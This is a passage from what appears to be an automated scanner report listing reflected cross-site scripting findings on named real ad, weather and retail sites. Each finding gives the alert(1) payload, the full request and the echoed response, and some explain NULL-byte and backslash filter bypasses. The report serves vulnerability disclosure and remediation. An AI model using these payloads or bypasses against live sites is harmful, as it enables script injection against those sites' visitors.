This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=5267357f824"%3balert(1)//5d114f1e2c3&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB21
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:17 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="5267357f824";alert(1)//5d114f1e2c3";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())
...[SNIP]...

5.117. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0443"%3balert(1)//1a3fa6ca155 was submitted in the cwpnet parameter. This input was echoed as a0443";alert(1)//1a3fa6ca155 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90&cwpnet=1a0443"%3balert(1)//1a3fa6ca155&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP202
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 13 May 02011 21:49:10 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5916
Date: Mon, 16 May 2011 01:22:22 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:02 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="75238";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="523987";var ct="75238";var cf="728X90";var cn="1a0443";alert(1)//1a3fa6ca155";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=navigator;var _cwl=
...[SNIP]...

5.118. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3ccc"%3balert(1)//92d61175cab was submitted in the cwrun parameter. This input was echoed as f3ccc";alert(1)//92d61175cab in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200f3ccc"%3balert(1)//92d61175cab&cwadformat=728X90&cwpid=526735&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB26
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5831
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:00 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200f3ccc";alert(1)//92d61175cab";var cw="728";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;
...[SNIP]...

5.119. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ca89"%3balert(1)//7f75bf95394 was submitted in the cwtagid parameter. This input was echoed as 2ca89";alert(1)//7f75bf95394 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=752382ca89"%3balert(1)//7f75bf95394 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP201
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Sat, 14 May 02011 11:14:24 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 5944
Date: Mon, 16 May 2011 01:22:27 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:09:07 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="752382ca89";alert(1)//7f75bf95394";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="523987";var ct="752382ca89";alert(1)//7f75bf95394";var cf="728X90";var cn="1";String.prototype.cwcon
...[SNIP]...

5.120. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00dbddc"%3balert(1)//2ec3f6439ea was submitted in the cwwidth parameter. This input was echoed as dbddc";alert(1)//2ec3f6439ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=526735&cwwidth=728%00dbddc"%3balert(1)//2ec3f6439ea&cwheight=90&cwpnet=1&cwtagid=81610 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: V=8vciuQJMXXJY; cwbh1=2532%3B06%2F14%2F2011%3BAMQU1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Wed, 04 May 2011 15:16:23 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5832
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:20:27 GMT
Connection: close
Set-Cookie: cw=cw; domain=.contextweb.com; path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="526735";var ct="81610";var cf="728X90";var ca="VIEWAD";var cr="200";var cw="728.dbddc";alert(1)//2ec3f6439ea";var ch="90";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="und
...[SNIP]...

5.121. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tag.contextweb.com
Path:	/TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94823"%3balert(1)//da5a2530254 was submitted in the cwwidth parameter. This input was echoed as 94823";alert(1)//da5a2530254 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=523987&cwwidth=72894823"%3balert(1)//da5a2530254&cwheight=90&cwpnet=1&cwtagid=75238 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cwbh1=2532%3B06%2F14%2F2011%3BAMQU1; V=8vciuQJMXXJY; pb_rtb_ev=1:531292.AG-00000001389358554.0; C2W4=3EtJ7FDeWFTzZJDT0WzXPE0M3LUNpfc5osYrUGLfF5OzhXGVekceXQQ; cw=cw

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP205
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 13 May 02011 21:46:58 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Date: Mon, 16 May 2011 01:21:25 GMT
Content-Length: 5916
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Mon, 16-May-2011 04:08:05 GMT; Path=/

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="523987";var cwtagid="75238";var cwadformat="728X90";var ca="VIEWAD";var cr="200";var cw="72894823";alert(1)//da5a2530254";var ch="90";var cads="0";var cp="523987";var ct="75238";var cf="728X90";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];
...[SNIP]...

5.122. http://wow.weather.com/weather/wow/module/USNY0400 [config parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wow.weather.com
Path:	/weather/wow/module/USNY0400

Issue detail

The value of the config request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c278\'%3balert(1)//0c2af714aa4 was submitted in the config parameter. This input was echoed as 1c278\\';alert(1)//0c2af714aa4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b83814781c278\'%3balert(1)//0c2af714aa4&proto=http:&target=wx_module HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:20:23 GMT
Server: Apache
SVRNAME: web2x07
Vary: Accept-Encoding
Content-Length: 5721
Content-Type: text/html

if (document.getElementById && !document.getElementById('wx_wow_css') )
{
var head = document.getElementsByTagName('head')[0];
var link = document.createElement('link');

...[SNIP]...
<A HREF="http://wowweb.weather.com?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b83814781c278\\';alert(1)//0c2af714aa4&par=WOWsnull_null&site=null&cm_ven=WOWsnull&cm_cat=null&code=brand&promo=logo&cm_ite=brand&cm_pla=logo" style="text-decoration:none;" target="wownewwin">
...[SNIP]...

5.123. http://wow.weather.com/weather/wow/module/USNY0400 [target parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wow.weather.com
Path:	/weather/wow/module/USNY0400

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1b30'%3balert(1)//5bc7f5a3bd7 was submitted in the target parameter. This input was echoed as e1b30';alert(1)//5bc7f5a3bd7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /weather/wow/module/USNY0400?config=SZ=teaser*lnk=http|www.observertoday.com/page/weather.lg/*PID=1031326525*DN=www.observertoday.com*MD5=a3ba9b5a384a7b45c7888527b8381478&proto=http:&target=wx_modulee1b30'%3balert(1)//5bc7f5a3bd7 HTTP/1.1
Host: wow.weather.com
Proxy-Connection: keep-alive
Referer: http://www.observertoday.com/page/content.detail/id/559280/-Special-day--for-1-000-graduates-at-Fredonia-State.html?nav=5047
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:09 GMT
Server: Apache
SVRNAME: web2x06
Vary: Accept-Encoding
Content-Length: 5483
Content-Type: text/html

if (document.getElementById && !document.getElementById('wx_wow_css') )
{
var head = document.getElementsByTagName('head')[0];
var link = document.createElement('link');

...[SNIP]...
d, moduleHTML)

} else {
document.getElementById(mydivId).className = "wow_container";
document.getElementById(mydivId).innerHTML = moduleHTML;

}

}
init('wx_modulee1b30';alert(1)//5bc7f5a3bd7','<div style="border:0px 0px 0px 0px;padding:0px 0px 0px 0px;margin: 0px 0px 0px 0px;position:relative; width:238px; height:60px; overflow:hidden;">
...[SNIP]...

5.124. https://www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.sonystyle.com
Path:	/webapp/wcs/stores/servlet/LogonForm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc38b"><script>alert(1)</script>81999f0f744 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /webapp/wcs/stores/servlet/LogonForm?storeId=10151&langId=-1&catalogId=10551&URL=SYAccountProfileView HTTP/1.1
Host: www.sonystyle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=fc38b"><script>alert(1)</script>81999f0f744
Cookie: TS5bbf46=f5a3eb9e27e2bffb98b2405b1503cf8878ed098d530cefc94dd0437160ac0ec518a9cd87529ede9f11ea93b61389de873146ef5f529ede9ff3fa25813fc776346bd26e6edb2332024890f70e222f7b4e4890f70e4b9b8efe5667a7cd4deb37804890f70ef7bac4d65cd85ce1ea147da6fb05aed8; mbox=check#true#1305494554|session#1305494389047-605069#1305496354|PC#1305494389047-605069.17#1306704094; s_cc=true; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253DSony%252520Store%2526pidt%253D1%2526oid%253Dhttps%25253A//www.sonystyle.com/webapp/wcs/stores/servlet/LogonForm%25253FstoreId%25253D10151%252526langId%25253D-1%252526catalogId%25253D1055%2526ot%253DA; fsr.s={"v":1,"rid":"1305494398924_849794","cp":{"cybershot":"N","innovation":"N","experts":"N"},"pv":5,"c":"https://www.sonystyle.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","lc":{"d0":{"v":5,"s":true,"e":2}},"cd":0,"sd":0}; s_vi=[CS]v1|26E821BE851631F8-400001A4801F70D4[CE]; JSESSIONID=0000swi2mynvgN0b4v4Ck42F0Ou:14aelsmcl; WC_PERSISTENT=tibXcp5Dlk4Jh%2fA0Lwms1Uargj4%3d%0a%3b2011%2d05%2d15+17%3a21%3a17%2e83%5f1305494403722%2d66941%5f10151%5f239700478%2c%2d1%2cUSD%5f10151; WC_SESSION_ESTABLISHED=true; WC_ACTIVEPOINTER=%2d1%2c10151; BIGipServerlivenew.sonystyle.com-80=1988239776.20480.0000; 71737897-VID=16601155425835; 71737897-SKEY=1547318312735205030; HumanClickSiteContainerID_71737897=STANDALONE; WC_USERACTIVITY_239700478=239700478%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cW0B82C6kt%2fu1ZnIDD%2bD9cyUsUuZ5p6eV3VX9sG%2bxOfyS%2fVahUux21ujZk%2fh12gxePDRShlaYz5Kb%0arseHaKhahut2Hi0TlmPEHwulUbbCf3yqB5j8879HQFm5kyylh3cBPYT%2fYDZLv6Pzx7s%2b8JmOJA%3d%3d; WC_AUTHENTICATION_239700478=239700478%2cPqxvbxzhgcoXK6H6uawMpABBdk0%3d

Response

HTTP/1.1 200 OK
ntCoent-Length: 87894
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 87894
Vary: Accept-Encoding
Date: Sun, 15 May 2011 21:25:50 GMT
Connection: keep-alive
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: No-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<script type="text/javascript" src="//nexus2.e
...[SNIP]...
<input type="hidden" value="http://www.google.com/search?hl=en&q=fc38b"><script>alert(1)</script>81999f0f744" name="redirectURL"/>
...[SNIP]...

5.125. http://f.nexac.com/e/a-677/s-2140.xgi [na_id cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

The value of the na_id cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 326a9"><script>alert(1)</script>fa144a76584 was submitted in the na_id cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /e/a-677/s-2140.xgi?na_random=678669980&na_url=http%3A//www.fingerhut.com/&na_referrer=&na_title=Fingerhut%3A%20Apply%20For%20Credit%20Get%20Low%20Monthly%20Payments&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw=Apply%20for%20Credit%2C%20Low%20Monthly%20Payments%2C%20Apparel%2C%20Electronics%2C%20Bed%2C%20Bath%2C%20Toys%2C%20Video%20Games%2C%20MP3%20Players%2C%20Home%20Furnishings HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=326a9"><script>alert(1)</script>fa144a76584; na_lr=20110515; na_ps=1; na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=326a9%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Efa144a76584; expires=Wed, 15-May-2013 01:39:13 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:39:13 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:39:13 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:39:13 GMT
Server: lighttpd/1.4.18
Content-Length: 541

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=html&uhint=na_id%3d326a9"><script>alert(1)</script>fa144a76584&phint=__bk_t%3dFingerhut: Apply For Credit Get Low Monthly Payments&phint=__bk_k%3dApply for Credit, Low Monthly Payments, Apparel, Electronics, Bed, Bath, Toys, Video Games, MP3 Players, Home Furnish
...[SNIP]...

5.126. http://optimized-by.rubiconproject.com/a/dk.js [ruid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The value of the ruid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9420e"-alert(1)-"ad6a30360a0 was submitted in the ruid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /a/dk.js?defaulting_ad=x303190.js&size_id=2&account_id=4462&site_id=5032&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=9420e"-alert(1)-"ad6a30360a0; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=5032^1; csi2=3158416.js^1^1305508790^1305508790; rpb=5671%3D1; put_2081=AG-00000001389358554

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:22:18 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Mon, 16-May-2011 02:22:18 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110261; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3179363.js^2^1305508799^1305508938&3158416.js^1^1305508790^1305508790; expires=Mon, 23-May-2011 01:22:18 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
